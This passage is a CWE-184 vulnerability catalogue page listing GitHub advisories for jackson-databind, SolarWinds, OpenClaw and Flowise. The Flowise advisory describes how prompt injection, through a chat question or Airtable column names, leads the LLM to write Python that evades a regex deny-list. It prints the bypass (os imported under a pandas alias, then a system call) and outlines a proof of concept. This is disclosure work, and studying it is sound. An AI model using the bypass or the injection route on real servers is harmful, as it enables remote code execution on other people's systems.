Common Weakness Enumeration

CWE-184

Allowed

Incomplete List of Disallowed Inputs

Abstraction: Base · Status: Draft

The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.

306 vulnerabilities reference this CWE, most recent first.

GHSA-RMJ7-2VXQ-3G9F

Vulnerability from github – Published: 2026-06-23 21:22 – Updated: 2026-06-23 21:22
VLAI
Summary
jackson-databind has an array subtype allowlist bypass in BasicPolymorphicTypeValidator (allowIfSubTypeIsArray)
Details

Summary

BasicPolymorphicTypeValidator.Builder.allowIfSubTypeIsArray() allowlists any array type based only on clazz.isArray(), without validating the array's component (element) type against the configured allowlist. A PTV built with allowIfSubTypeIsArray() plus an explicit concrete-type allowlist therefore still permits EvilType[] even though EvilType is not allowlisted. When Jackson deserializes the elements and no per-element type IDs are present, it instantiates the component type directly with no further PTV check, bypassing the allowlist.

Impact

Applications using BasicPolymorphicTypeValidator with allowIfSubTypeIsArray() as a safeguard get no protection for concrete array component types; an attacker controlling JSON can instantiate non-allowlisted types via an array wrapper, re-opening the gadget-instantiation risk PTV is meant to prevent.

Affected / Patched (verified via git tag --contains)

  • 2.18 line: >= 2.10.0, < 2.18.8 -> fixed in 2.18.8
  • 2.19-2.21 line: >= 2.19.0, < 2.21.4 -> fixed in 2.21.4
  • 3.x line: >= 3.0.0, < 3.1.4 -> fixed in 3.1.4

PolymorphicTypeValidator was added in 2.10.0 so vulnerability N/A for versions prior to that.

Severity / CWE

Maintainer: significant. Reporter: HIGH. CWE-184 (Incomplete List of Disallowed Inputs); related CWE-502.

Upstream fix

FasterXML/jackson-databind#5981; fix PR #5983 (24529da), 2.18 backport PR #5984 (01d1692). Released 2026-06-04 in 2.18.8 / 2.21.4 / 3.1.4.

Credits

Omkhar Arasaratnam (@omkhar) - finder.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.10.0"
            },
            {
              "fixed": "2.18.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.19.0"
            },
            {
              "fixed": "2.21.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "tools.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54513"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-23T21:22:15Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n`BasicPolymorphicTypeValidator.Builder.allowIfSubTypeIsArray()` allowlists any array type based only on `clazz.isArray()`, without validating the array\u0027s component (element) type against the configured allowlist. A PTV built with `allowIfSubTypeIsArray()` plus an explicit concrete-type allowlist therefore still permits `EvilType[]` even though `EvilType` is not allowlisted. When Jackson deserializes the elements and no per-element type IDs are present, it instantiates the component type directly with no further PTV check, bypassing the allowlist.\n\n## Impact\nApplications using `BasicPolymorphicTypeValidator` with `allowIfSubTypeIsArray()` as a safeguard get no protection for concrete array component types; an attacker controlling JSON can instantiate non-allowlisted types via an array wrapper, re-opening the gadget-instantiation risk PTV is meant to prevent.\n\n## Affected / Patched (verified via `git tag --contains`)\n- 2.18 line: `\u003e= 2.10.0, \u003c 2.18.8` -\u003e fixed in **2.18.8**\n- 2.19-2.21 line: `\u003e= 2.19.0, \u003c 2.21.4` -\u003e fixed in **2.21.4**\n- 3.x line: `\u003e= 3.0.0, \u003c 3.1.4` -\u003e fixed in **3.1.4**\n\n`PolymorphicTypeValidator` was added in 2.10.0 so vulnerability N/A for versions prior to that.\n\n## Severity / CWE\nMaintainer: significant. Reporter: HIGH. CWE-184 (Incomplete List of Disallowed Inputs); related CWE-502.\n\n## Upstream fix\nFasterXML/jackson-databind#5981; fix PR #5983 (`24529da`), 2.18 backport PR #5984 (`01d1692`). Released 2026-06-04 in 2.18.8 / 2.21.4 / 3.1.4.\n\n## Credits\nOmkhar Arasaratnam (@omkhar) - finder.",
  "id": "GHSA-rmj7-2vxq-3g9f",
  "modified": "2026-06-23T21:22:15Z",
  "published": "2026-06-23T21:22:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-rmj7-2vxq-3g9f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/issues/5981"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/issues/5983"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/pull/5984"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/01d1692c8d0ed03e51a0e3c4f8a9e6908e4931e5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/24529da29fdf46ff94ca38de9ebf31cd188f5e8e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FasterXML/jackson-databind"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "jackson-databind has an array subtype allowlist bypass in BasicPolymorphicTypeValidator (allowIfSubTypeIsArray)"
}

GHSA-RRCV-RXHJ-PJH8

Vulnerability from github – Published: 2023-07-26 15:30 – Updated: 2024-04-04 06:21
VLAI
Details

The SolarWinds Platform was susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with SYSTEM privileges.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-23844"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-697"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-26T14:15:10Z",
    "severity": "HIGH"
  },
  "details": "The SolarWinds Platform was susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with SYSTEM privileges.",
  "id": "GHSA-rrcv-rxhj-pjh8",
  "modified": "2024-04-04T06:21:58Z",
  "published": "2023-07-26T15:30:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23844"
    },
    {
      "type": "WEB",
      "url": "https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2023-3_release_notes.htm"
    },
    {
      "type": "WEB",
      "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2023-23844"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RWRG-63C8-2784

Vulnerability from github – Published: 2026-07-08 18:31 – Updated: 2026-07-08 18:31
VLAI
Details

OpenClaw before 2026.5.28 contains a credential exposure vulnerability where workspace dotenv files can override provider credentials. Attackers with lower-trust access to configured input paths can expose sensitive data and credentials that should remain within trusted boundaries.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-59261"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-522"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-08T17:17:25Z",
    "severity": "HIGH"
  },
  "details": "OpenClaw before 2026.5.28 contains a credential exposure vulnerability where workspace dotenv files can override provider credentials. Attackers with lower-trust access to configured input paths can expose sensitive data and credentials that should remain within trusted boundaries.",
  "id": "GHSA-rwrg-63c8-2784",
  "modified": "2026-07-08T18:31:37Z",
  "published": "2026-07-08T18:31:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4pqj-3c56-5fqq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59261"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-credential-override-via-workspace-dotenv-files"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-V38X-C887-992F

Vulnerability from github – Published: 2026-04-18 00:46 – Updated: 2026-04-24 20:57
VLAI
Summary
Flowise: Airtable_Agent Code Injection Remote Code Execution Vulnerability
Details

ZDI-CAN-29412: FlowiseAI Flowise Airtable_Agent Code Injection Remote Code Execution Vulnerability

Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products: Flowise - Flowise

-- VULNERABILITY DETAILS ------------------------ * Version tested: 3.0.13 * Installer file: hxxps://github.com/FlowiseAI/Flowise * Platform tested: Ubuntu 25.10


Analysis

FlowiseAI Flowise Airtable Agent pythonCode Prompt Injection Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of FlowiseAI Flowise. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the run method of the Airtable_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. An attacker can leverage this vulnerability to execute code in the context of the user running the server.

Product information

FlowiseAI Flowise version 3.0.13 (https://github.com/FlowiseAI/Flowise)

Setup Instructions

npm install -g flowise@3.0.13 npx flowise start

Root Cause Analysis

FlowiseAI Flowise is an open source low-code tool for developers to build customized large language model (LLM) applications and AI agents. It supports integration with various LLMs, data sources, and tools in order to facilitate rapid development and deployment of AI solutions. Flowise offers a web interface with a drag-and-drop editor, as well as an API, through an Express web server accessible over HTTP on port 3000/TCP.

One such feature of Flowise is the ability to create chatflows. Chatflows use a drag and drop editor that allow a developer to place nodes which control how an interaction with a LLM will occur. One such node is the Airtable Agent node that represents an Agent used to answer queries on a provided Airtable table.

When a user makes a query against a chatflow using the Airtable Agent node, the run method of the Airtable_Agents class will be called. This method will first request the contents of the Airtable table passed to the node and convert it to a base64 string. It will then set up a pyodide environment and create a python script to be executed in this environment. This python script will use pandas to extract the column names and their types from the Airtable table. The method will then create a system prompt for an LLM using this data as follows:

You are working with a pandas dataframe in Python. The name of the dataframe is df.

The columns and data types of a dataframe are given below as a Python dictionary with keys showing column names and values showing the data types.
{dict}

I will ask question, and you will output the Python code using pandas dataframe to answer my question. Do not provide any explanations. Do not respond with anything except the output of the code.

Security: Output ONLY pandas/numpy operations on the dataframe (df). Do not use import, exec, eval, open, os, subprocess, or any other system or file operations. The code will be validated and rejected if it contains such constructs.

Question: {question}
Output Code:

Where {dict} is the extracted column names and {question} is the initial prompt provided by the user.

This system prompt will be sent to an LLM in order for it to generate a python script based on the user's prompt, and the LLM generated response will be stored in a variable name pythonCode. The method will then evaluate the pythonCode variable in a pyodide environment.

While the LLM-generated Python script is evaluated in a non-sandboxed environment, there is a list of forbidden patterns that are checked for before the script is executed on the server. The function validatePythonCodeForDataFrame() enumerates through a list, named FORBIDDEN_PATTERNS, which contains pairs of regex pattern and reasons. Each regex pattern is run against the Python script, and if the pattern is found in the script, the script is invalidated and is not run, responding to the request with a reason for rejection.

The input validation can be bypassed, which can still lead to running arbitrary OS commands on the server. An example of this is the pattern /\bimport\s+(?!pandas|numpy\b)/g, which intends to search for lines of code which import a module other than pandas or numpy. This can be bypassed by importing along with pandas or numpy. For example, consider the following lines of code:

import pandas as np, os as pandas
pandas.system("xcalc")

pandas is imported, but so is the os module, with pandas as its alias. OS commands can then be invoked with pandas.system().

Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the Airtable Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the flowise server.

An attacker can use this vulnerability to execute arbitrary python code, which can lead to arbitrary system commands being executed on the target server.

It is also possible for an authenticated attacker to exploit this vulnerability by specifying an attacker controlled server in a chatflow. This server would respond to prompts with an attacker controlled python script instead of an LLM generated response, which would then be evaluated on the server.

It is also possible for an authenticated attacker to exploit this vulnerability by specifying an attacker controlled Airtable table in a chatflow. This airtable table would contain columns whose name contain prompt injections, that are later passed to an LLM to use when generating a python script.

comments documenting the issue have been added to the following code snippet. Added comments are prepended with "!!!".

From packages/components/nodes/agents/AirtableAgent/core.ts

import type { PyodideInterface } from 'pyodide'
import * as path from 'path'
import { getUserHome } from '../../../src/utils'

let pyodideInstance: PyodideInterface | undefined

export async function LoadPyodide(): Promise<PyodideInterface> {
    if (pyodideInstance === undefined) {
        const { loadPyodide } = await import('pyodide')
        const obj: any = { packageCacheDir: path.join(getUserHome(), '.flowise', 'pyodideCacheDir') }
        pyodideInstance = await loadPyodide(obj)
        await pyodideInstance.loadPackage(['pandas', 'numpy'])
    }

    return pyodideInstance
}

export const systemPrompt = `You are working with a pandas dataframe in Python. The name of the dataframe is df.

The columns and data types of a dataframe are given below as a Python dictionary with keys showing column names and values showing the data types.
{dict}

I will ask question, and you will output the Python code using pandas dataframe to answer my question. Do not provide any explanations. Do not respond with anything except the output of the code.

Security: Output ONLY pandas/numpy operations on the dataframe (df). Do not use import, exec, eval, open, os, subprocess, or any other system or file operations. The code will be validated and rejected if it contains such constructs.

Question: {question}
Output Code:`

export const finalSystemPrompt = `You are given the question: {question}. You have an answer to the question: {answer}. Rephrase the answer into a standalone answer.
Standalone Answer:`

From packages/components/nodes/agents/AirtableAgent/AirtableAgent.ts

import axios from 'axios'
import { BaseLanguageModel } from '@langchain/core/language_models/base'
import { AgentExecutor } from 'langchain/agents'
import { LLMChain } from 'langchain/chains'
import { ICommonObject, INode, INodeData, INodeParams, IServerSideEventStreamer, PromptTemplate } from '../../../src/Interface'
import { getBaseClasses, getCredentialData, getCredentialParam } from '../../../src/utils'
import { ConsoleCallbackHandler, CustomChainHandler, additionalCallbacks } from '../../../src/handler'
import { LoadPyodide, finalSystemPrompt, systemPrompt } from './core'
import { validatePythonCodeForDataFrame } from '../../../src/pythonCodeValidator'
import { checkInputs, Moderation } from '../../moderation/Moderation'
import { formatResponse } from '../../outputparsers/OutputParserHelpers'

class Airtable_Agents implements INode {
    label: string
    name: string
    version: number
    description: string
    type: string
    icon: string
    category: string
    baseClasses: string[]
    credential: INodeParams
    inputs: INodeParams[]

    // !!! [... Truncated for Readability ...]

    // !!! input variable holds prompt from user
    async run(nodeData: INodeData, input: string, options: ICommonObject): Promise<string | object> {
        const model = nodeData.inputs?.model as BaseLanguageModel
        const baseId = nodeData.inputs?.baseId as string
        const tableId = nodeData.inputs?.tableId as string
        const returnAll = nodeData.inputs?.returnAll as boolean
        const limit = nodeData.inputs?.limit as string
        const moderations = nodeData.inputs?.inputModeration as Moderation[]

        // !!! the chatflow may contain moderation nodes that search for prompt injections, but these may not protect from every type of injection
        if (moderations && moderations.length > 0) {
            try {
                // Use the output of the moderation chain as input for the Vectara chain
                input = await checkInputs(moderations, input)
            } catch (e) {
                await new Promise((resolve) => setTimeout(resolve, 500))
                // if (options.shouldStreamResponse) {
                //     streamResponse(options.sseStreamer, options.chatId, e.message)
                // }
                return formatResponse(e.message)
            }
        }

        const shouldStreamResponse = options.shouldStreamResponse
        const sseStreamer: IServerSideEventStreamer = options.sseStreamer as IServerSideEventStreamer
        const chatId = options.chatId

        const credentialData = await getCredentialData(nodeData.credential ?? '', options)
        const accessToken = getCredentialParam('accessToken', credentialData, nodeData)

        let airtableData: ICommonObject[] = []

        // !!! Get Airtable data
        if (returnAll) {
            airtableData = await loadAll(baseId, tableId, accessToken)
        } else {
            airtableData = await loadLimit(limit ? parseInt(limit, 10) : 100, baseId, tableId, accessToken)
        }

        let base64String = Buffer.from(JSON.stringify(airtableData)).toString('base64')

        const loggerHandler = new ConsoleCallbackHandler(options.logger, options?.orgId)
        const callbacks = await additionalCallbacks(nodeData, options)

        const pyodide = await LoadPyodide()

        // First load the csv file and get the dataframe dictionary of column types
        // For example using titanic.csv: {'PassengerId': 'int64', 'Survived': 'int64', 'Pclass': 'int64', 'Name': 'object', 'Sex': 'object', 'Age': 'float64', 'SibSp': 'int64', 'Parch': 'int64', 'Ticket': 'object', 'Fare': 'float64', 'Cabin': 'object', 'Embarked': 'object'}
        let dataframeColDict = ''
        try {
            const code = `import pandas as pd
import base64
import json

base64_string = "${base64String}"

decoded_data = base64.b64decode(base64_string)

json_data = json.loads(decoded_data)

df = pd.DataFrame(json_data)
my_dict = df.dtypes.astype(str).to_dict()
print(my_dict)
json.dumps(my_dict)`
            dataframeColDict = await pyodide.runPythonAsync(code)
        } catch (error) {
            throw new Error(error)
        }

        // !!! ask LLM to come up with python script...
        // Then tell GPT to come out with ONLY python code
        // For example: len(df), df[df['SibSp'] > 3]['PassengerId'].count()
        let pythonCode = ''
        if (dataframeColDict) {
            const chain = new LLMChain({
                llm: model,
                // !!! prompt passed to LLM
                prompt: PromptTemplate.fromTemplate(systemPrompt),
                verbose: process.env.DEBUG === 'true' ? true : false
            })
            const inputs = {
                // !!! Airtable column names are also subbed into the system prompt which may also contain prompt injections
                dict: dataframeColDict,
                // !!! question, which is later subbed into the system prompt, is given the value of the user's prompt (which may contain prompt injections)
                question: input
            }
            const res = await chain.call(inputs, [loggerHandler, ...callbacks])
            // !!! the LLM's responce is assigned to the pythonCode variable
            pythonCode = res?.text
            // Regex to get rid of markdown code blocks syntax
            pythonCode = pythonCode.replace(/^```[a-z]+\n|\n```$/gm, '')
        }

        // Then run the code using Pyodide (only after validating to prevent RCE)
        let finalResult = ''
        if (pythonCode) {
            const validation = validatePythonCodeForDataFrame(pythonCode)
            if (!validation.valid) {
                throw new Error(
                    `Generated code was rejected for security reasons (${
                        validation.reason ?? 'unsafe construct'
                    }). Please rephrase your question to use only pandas DataFrame operations.`
                )
            }
            try {
                // !!! The python code is evaluated in a non-sandboxed environment
                const code = `import pandas as pd\n${pythonCode}`
                // TODO: get print console output
                finalResult = await pyodide.runPythonAsync(code)
            } catch (error) {
                throw new Error(`Sorry, I'm unable to find answer for question: "${input}" using following code: "${pythonCode}"`)
            }
        }

        // Finally, return a complete answer
        if (finalResult) {
            const chain = new LLMChain({
                llm: model,
                prompt: PromptTemplate.fromTemplate(finalSystemPrompt),
                verbose: process.env.DEBUG === 'true' ? true : false
            })
            const inputs = {
                question: input,
                answer: finalResult
            }

            if (options.shouldStreamResponse) {
                const handler = new CustomChainHandler(shouldStreamResponse ? sseStreamer : undefined, chatId)
                const result = await chain.call(inputs, [loggerHandler, handler, ...callbacks])
                return result?.text
            } else {
                const result = await chain.call(inputs, [loggerHandler, ...callbacks])
                return result?.text
            }
        }

        return pythonCode
    }
}

Proof of Concept

A proof of concept for this vulnerability is provided in ./poc.py. It expects the following syntax:

    python3 poc.py --method [server OR chatflow OR prompt_injection] [--user <USER> --passwd <password> --host <HOST> --r_host <R_HOST> --r_port <R_PORT> --l_port <L_PORT> --port <PORT> --cmd <CMD> --chatflow_id <CHAT_ID> --airtable_token <AIRTABLE_TOKEN> --base_id <BASE_ID> --table_id <TABLE_ID>]

Where USER is a username of a user on the server, PASSWORD is the user's password, HOST is the ip address of the vulnerable flowise server, R_HOST is the ip address of a malicious server started by this poc, R_PORT is the port a malicious server started by this poc is listening on (default: 5000), L_PORT is the port a malicious server started by this poc should listening on (default: 5000), PORT is the port the vulnerable flowise server is listening on (default: 3000), CMD is the command to execute on the flowise server (default: xcalc), CHAT_ID is the chatflow id of a chatflow using the Airflow Agent node, AIRTABLE_TOKEN is an api key for an Airtable account, BASE_ID is the base id to find an airflow table in, and TABLE_ID is the airflow table to use.

This poc has three modes of operation controlled by the method argument. The method argument may have any of the values "server" OR "chatflow" OR "prompt_injection".

method = "server"

By default the poc will start a malicious server listening on the port specified by the value. This server will respond to requests made to the "/api/chat" endpoint with a JSON object containing an LLM response that contains a malicious python script. This python script will execute a command specified by the value.

method = "chatflow"

By default, the poc will first establish an authenticated session on the server using the and arguments. It will then send a POST request to the "/api/v1/chatflow" endpoint with a JSON body containing a crafted chatflow using an Airflow Agent node and a ChatOllama node configured with a server specified by the and arguments. The Airflow Agent node will be configured using the , , and arguments. The default values of these arguments will be valid for 14 days from 2026-02-22. The poc will then send a POST request to the "/api/v1/internal-prediction/" endpoint in order to trigger a prediction using the chatflow.

It is intended that the server specified in the chatflow is a server started using the server method of this poc. When making a prediction against this chatflow, flowise will send a request to the specified server in order to generate an LLM response. The response recieved by flowise will be evaluated as a python script. Upon successful exploitation, The argument passed to the server method of this poc will be executed on the vulnerable flowise server.

method = "prompt_injection"

By default, the poc will send a POST request to the "/api/v1/prediction/chat_id" endpoint, where chat_id is a vulnerable chatflow id specified by the parameter. The JSON body of this request will contain a question member whose value will be a prompt containing a prompt injection. Upon successful exploitation, The argument will be executed on the vulnerable flowise server.

Due to the nature of LLM responses, it may take multiple attempts to be successful or require a different prompt injection technique depending on the model used.

Testing Environment

The provided proof of concept was tested using FlowiseAI Flowise version 3.0.13 runing on a Ubuntu 25.10 VM. The prompt injection method was tested using the Llama3.2 model running in Ollama.

How This Differs from CVE-2026-41138

CVE-2026-41138 introduced sanitization for the Pyodide code ran by the Airtable Agent. This advisory demonstrates a bypass of that sanitization, which we addressed separately by disallowing imports outright.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise-components"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41265"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-18T00:46:04Z",
    "nvd_published_at": "2026-04-23T20:16:14Z",
    "severity": "CRITICAL"
  },
  "details": "ZDI-CAN-29412: FlowiseAI Flowise Airtable_Agent Code Injection Remote Code Execution Vulnerability\n\nTrend Micro\u0027s Zero Day Initiative has identified a vulnerability affecting the following products:\nFlowise - Flowise\n\n-- VULNERABILITY DETAILS ------------------------\n* Version tested:   3.0.13\n* Installer file:   hxxps://github.com/FlowiseAI/Flowise\n* Platform tested:  Ubuntu 25.10\n\n---\n\n### Analysis\n\n# FlowiseAI Flowise Airtable Agent pythonCode Prompt Injection Remote Code Execution Vulnerability\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of FlowiseAI Flowise. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the run method of the Airtable_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. An attacker can leverage this vulnerability to execute code in the context of the user running the server.\n\n### Product information\n\nFlowiseAI Flowise version 3.0.13 (https://github.com/FlowiseAI/Flowise)\n\n### Setup Instructions\n\nnpm install -g flowise@3.0.13\nnpx flowise start\n\n### Root Cause Analysis\n\nFlowiseAI Flowise is an open source low-code tool for developers to build customized large language model (LLM) applications and AI agents. It supports integration with various LLMs, data sources, and tools in order to facilitate rapid development and deployment of AI solutions. Flowise offers a web interface with a drag-and-drop editor, as well as an API, through an Express web server accessible over HTTP on port 3000/TCP.\n\nOne such feature of Flowise is the ability to create chatflows. Chatflows use a drag and drop editor that allow a developer to place nodes which control how an interaction with a LLM will occur. One such node is the Airtable Agent node that represents an Agent used to answer queries on a provided Airtable table.\n\nWhen a user makes a query against a chatflow using the Airtable Agent node, the run method of the Airtable_Agents class will be called. This method will first request the contents of the Airtable table passed to the node and convert it to a base64 string. It will then set up a pyodide environment and create a python script to be executed in this environment. This python script will use pandas to extract the column names and their types from the Airtable table. The method will then create a system prompt for an LLM using this data as follows:\n\n```\nYou are working with a pandas dataframe in Python. The name of the dataframe is df.\n\nThe columns and data types of a dataframe are given below as a Python dictionary with keys showing column names and values showing the data types.\n{dict}\n\nI will ask question, and you will output the Python code using pandas dataframe to answer my question. Do not provide any explanations. Do not respond with anything except the output of the code.\n\nSecurity: Output ONLY pandas/numpy operations on the dataframe (df). Do not use import, exec, eval, open, os, subprocess, or any other system or file operations. The code will be validated and rejected if it contains such constructs.\n\nQuestion: {question}\nOutput Code:\n```\n\nWhere {dict} is the extracted column names and {question} is the initial prompt provided by the user.\n\nThis system prompt will be sent to an LLM in order for it to generate a python script based on the user\u0027s prompt, and the LLM generated response will be stored in a variable name pythonCode. The method will then evaluate the pythonCode variable in a pyodide environment.\n\nWhile the LLM-generated Python script is evaluated in a non-sandboxed environment, there is a list of forbidden patterns that are checked for before the script is executed on the server. The function validatePythonCodeForDataFrame() enumerates through a list, named FORBIDDEN_PATTERNS, which contains pairs of regex pattern and reasons. Each regex pattern is run against the Python script, and if the pattern is found in the script, the script is invalidated and is not run, responding to the request with a reason for rejection.\n\nThe input validation can be bypassed, which can still lead to running arbitrary OS commands on the server. An example of this is the pattern `/\\bimport\\s+(?!pandas|numpy\\b)/g`, which intends to search for lines of code which import a module other than pandas or numpy. This can be bypassed by importing along with pandas or numpy. For example, consider the following lines of code:\n\n```python\nimport pandas as np, os as pandas\npandas.system(\"xcalc\")\n```\n\npandas is imported, but so is the os module, with pandas as its alias. OS commands can then be invoked with `pandas.system()`. \n\nUsing prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the Airtable Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the flowise server.\n\nAn attacker can use this vulnerability to execute arbitrary python code, which can lead to arbitrary system commands being executed on the target server.\n\nIt is also possible for an authenticated attacker to exploit this vulnerability by specifying an attacker controlled server in a chatflow. This server would respond to prompts with an attacker controlled python script instead of an LLM generated response, which would then be evaluated on the server.\n\nIt is also possible for an authenticated attacker to exploit this vulnerability by specifying an attacker controlled Airtable table in a chatflow. This airtable table would contain columns whose name contain prompt injections, that are later passed to an LLM to use when generating a python script.\n\ncomments documenting the issue have been added to the following code snippet. Added comments are prepended with \"!!!\".\n\nFrom packages/components/nodes/agents/AirtableAgent/core.ts\n```ts\nimport type { PyodideInterface } from \u0027pyodide\u0027\nimport * as path from \u0027path\u0027\nimport { getUserHome } from \u0027../../../src/utils\u0027\n\nlet pyodideInstance: PyodideInterface | undefined\n\nexport async function LoadPyodide(): Promise\u003cPyodideInterface\u003e {\n    if (pyodideInstance === undefined) {\n        const { loadPyodide } = await import(\u0027pyodide\u0027)\n        const obj: any = { packageCacheDir: path.join(getUserHome(), \u0027.flowise\u0027, \u0027pyodideCacheDir\u0027) }\n        pyodideInstance = await loadPyodide(obj)\n        await pyodideInstance.loadPackage([\u0027pandas\u0027, \u0027numpy\u0027])\n    }\n\n    return pyodideInstance\n}\n\nexport const systemPrompt = `You are working with a pandas dataframe in Python. The name of the dataframe is df.\n\nThe columns and data types of a dataframe are given below as a Python dictionary with keys showing column names and values showing the data types.\n{dict}\n\nI will ask question, and you will output the Python code using pandas dataframe to answer my question. Do not provide any explanations. Do not respond with anything except the output of the code.\n\nSecurity: Output ONLY pandas/numpy operations on the dataframe (df). Do not use import, exec, eval, open, os, subprocess, or any other system or file operations. The code will be validated and rejected if it contains such constructs.\n\nQuestion: {question}\nOutput Code:`\n\nexport const finalSystemPrompt = `You are given the question: {question}. You have an answer to the question: {answer}. Rephrase the answer into a standalone answer.\nStandalone Answer:`\n```\n\nFrom packages/components/nodes/agents/AirtableAgent/AirtableAgent.ts\n```ts\nimport axios from \u0027axios\u0027\nimport { BaseLanguageModel } from \u0027@langchain/core/language_models/base\u0027\nimport { AgentExecutor } from \u0027langchain/agents\u0027\nimport { LLMChain } from \u0027langchain/chains\u0027\nimport { ICommonObject, INode, INodeData, INodeParams, IServerSideEventStreamer, PromptTemplate } from \u0027../../../src/Interface\u0027\nimport { getBaseClasses, getCredentialData, getCredentialParam } from \u0027../../../src/utils\u0027\nimport { ConsoleCallbackHandler, CustomChainHandler, additionalCallbacks } from \u0027../../../src/handler\u0027\nimport { LoadPyodide, finalSystemPrompt, systemPrompt } from \u0027./core\u0027\nimport { validatePythonCodeForDataFrame } from \u0027../../../src/pythonCodeValidator\u0027\nimport { checkInputs, Moderation } from \u0027../../moderation/Moderation\u0027\nimport { formatResponse } from \u0027../../outputparsers/OutputParserHelpers\u0027\n\nclass Airtable_Agents implements INode {\n    label: string\n    name: string\n    version: number\n    description: string\n    type: string\n    icon: string\n    category: string\n    baseClasses: string[]\n    credential: INodeParams\n    inputs: INodeParams[]\n\n    // !!! [... Truncated for Readability ...]\n\n    // !!! input variable holds prompt from user\n    async run(nodeData: INodeData, input: string, 